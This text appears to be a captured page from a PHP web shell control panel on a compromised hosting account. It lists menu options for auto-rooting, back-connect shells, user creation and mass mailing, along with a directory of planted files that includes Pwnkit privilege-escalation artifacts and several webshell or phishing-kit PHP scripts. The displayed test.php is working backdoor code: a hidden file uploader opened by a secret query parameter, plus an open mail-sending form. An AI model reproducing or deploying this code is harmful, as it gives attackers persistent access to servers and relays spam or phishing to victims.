Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
??? /
[ HOME SHELL ]
Name
Size
Permission
Action
-----GCONV_PATH=.
[ DIR ]
drwxr-xr-x
-----configFEW
[ DIR ]
drwxr-xr-x
----..pkexec
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
---+---test1.PhP7
466
B
-rw-r--r--
---+--test1.php
466
B
-rw-r--r--
----+---x.php
64.48
KB
-rw-r--r--
-------RDR.html
946
B
-rw-r--r--
-----bs2.PhP7
144.98
KB
-rw-r--r--
-----email.php
832
B
-rw-r--r--
-----pwnkit
10.99
KB
-rwxr-xr-x
-----rcc.PHP
34.16
KB
-rw-r--r--
-----test.php
1.1
KB
-rw-r--r--
-----x.PhP7
64.48
KB
-rw-r--r--
----bs2.php
144.98
KB
-rw-r--r--
----bu2.PhP7
136.81
KB
-rw-r--r--
----bu2.php
136.81
KB
-rw-r--r--
----efumwtjo.php
14.69
KB
-rw-r--r--
----m.PhP7
104.72
KB
-rw-r--r--
----m.php
104.72
KB
-rw-r--r--
----net.html
241
B
-rw-r--r--
----nsts2.PhP7
247.99
KB
-rw-r--r--
----nsts2.php
247.99
KB
-rw-r--r--
----prosellers2.PhP7
114.41
KB
-rw-r--r--
----prosellers2.php
114.41
KB
-rw-r--r--
----rc.php
34.16
KB
-rw-r--r--
----rcs2.PhP7
34.16
KB
-rw-r--r--
---.mad-root
0
B
-rw-r--r--
---index.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : -----test.php
<?php error_reporting(0); ?> Upload is <b><color>WORKING</color></b><br> Check Mailling ..<br> <form method="post"> <input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br> <input type="submit" value="Send test >>"> </form> <br> <?php if($_GET['Ghost'] =='send'){ $uploaddir = './'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if( isset($_FILES["userfile"]) ) { echo "Upload "; if(move_uploaded_file ($_FILES["userfile"]["tmp_name"], $uploadfile)) echo $uploadfile; else echo "failed"; } echo " <form name='uplform' method='post' action='?Ghost=send' enctype='multipart/form-data'> <p align='center'> <input type='file' name='userfile'> <input type='submit'> </p> "; } if(!empty($_POST['email'])){ if(!empty($_POST['email'])){ $xx =$_POST['orderid']; } else{ $xx = rand(); } mail($_POST['email'],"Result Report Test - ".$xx,"WORKING ! FoxAuto V6"); print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>"; } ?>
Close